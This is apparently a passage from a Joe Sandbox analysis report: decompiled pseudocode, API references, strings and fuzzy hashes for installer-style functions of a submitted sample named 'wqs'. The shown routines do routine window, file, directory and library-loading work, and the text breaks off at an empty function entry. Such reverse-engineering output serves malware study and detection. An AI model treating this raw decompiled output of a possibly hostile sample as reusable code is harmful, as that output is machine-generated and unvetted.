Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: 7071b985292706a63f1e4b2e85f49b16247090a83eb1416a6af2ac73d7dfe6a7
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4; // 0x10438
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00403418), ref: 004055FA
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll, xrefs: 004055C0, 004055D0, 004055D6, 004055F9, 00405605

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll
API String ID: 1495540970-1312370492
Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004068b1
0x004068ba
0x004068bc
0x004068bc
0x004068c0
0x004068d3
0x004068cd
0x004068cd
0x004068cd
0x004068ec
0x00406900
0x00406907

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

%s%S.dll, xrefs: 004068E6
UXTHEME, xrefs: 004068A3
\, xrefs: 004068C2

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 6C771817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E6C771817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6c77506c = _a8;
				 *0x6c775070 = _a16;
				 *0x6c775074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6c775048, E6C771651);
				_push(1);
				_t37 = E6C771BFF();
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6C77243E(_t54);
					}
					_push(_t54);
					E6C772480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E6C772655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6C771666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E6C772655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E6C772655();
							_t37 = GlobalFree(E6C771312(E6C771654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6C772618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E6C7715DD( *0x6c775068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6C772E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6C772B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6C772810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6c771817
0x6c771817
0x6c771817
0x6c771824
0x6c77182c
0x6c771839
0x6c771847
0x6c77184a
0x6c77184c
0x6c771851
0x6c771856
0x6c771978
0x6c771978
0x6c77185c
0x6c771860
0x6c771863
0x6c771868
0x6c771869
0x6c77186a
0x6c771870
0x6c771876
0x6c7718a6
0x6c7718ad
0x6c7718d1
0x6c77191e
0x6c77191f
0x6c7718d3
0x6c7718d3
0x6c7718d4
0x6c7718dd
0x6c7718de
0x6c7718e8
0x6c7718eb
0x6c7718f0
0x6c7718f7
0x6c7718f7
0x6c7718fd
0x6c7718fe
0x6c771904
0x6c77190a
0x6c771917
0x6c771918
0x6c77191b
0x6c7718af
0x6c7718af
0x6c7718b0
0x6c7718c5
0x6c7718c5
0x6c771929
0x6c77192c
0x6c771939
0x6c771940
0x6c771948
0x6c77194b
0x6c77194b
0x6c771948
0x6c771958
0x6c771960
0x6c771965
0x6c771958
0x6c77196d
0x00000000
0x6c77196f
0x00000000
0x6c771970
0x6c77196d
0x6c77187a
0x6c77187d
0x6c77189b
0x00000000
0x00000000
0x6c77189e
0x6c7718a3
0x6c7718a3
0x6c7718a5
0x00000000
0x6c7718a5
0x6c77187f
0x6c771880
0x6c771888
0x6c771889
0x00000000
0x6c771889
0x6c771882
0x6c771883
0x6c771891
0x00000000
0x6c771891
0x6c771886
0x00000000
0x00000000
0x00000000
0x6c771886

APIs

Part of subcall function 6C771BFF: GlobalFree.KERNEL32(?), ref: 6C771E74
Part of subcall function 6C771BFF: GlobalFree.KERNEL32(?), ref: 6C771E79
Part of subcall function 6C771BFF: GlobalFree.KERNEL32(?), ref: 6C771E7E

GlobalFree.KERNEL32(00000000), ref: 6C7718C5
FreeLibrary.KERNEL32(?), ref: 6C77194B
GlobalFree.KERNEL32(00000000), ref: 6C771970

Part of subcall function 6C77243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6C77246F

Part of subcall function 6C772810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6C771896,00000000), ref: 6C7728E0

Part of subcall function 6C771666: wsprintfW.USER32 ref: 6C771694

Strings

, xrefs: 6C771951

Memory Dump Source

Source File: 0000000B.00000002.1053928875.000000006C771000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C770000, based on PE: true

Associated: 0000000B.00000002.1053905102.000000006C770000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1053982527.000000006C774000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1054013557.000000006C776000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c770000_wqs.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 09b712556dc1bf8aed98d49eadd44db45edd56412b42ce0dffda1976c234c375
Instruction ID: 5cc00091a6b2943c4b25c09e09d7dde16d23084d296755e83f44a6b2517399cb
Opcode Fuzzy Hash: 09b712556dc1bf8aed98d49eadd44db45edd56412b42ce0dffda1976c234c375
Instruction Fuzzy Hash: EC41CE71A0024DDBDF209F35DAACBD53BA8AB05328F144575E92DAA986DB74C089CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

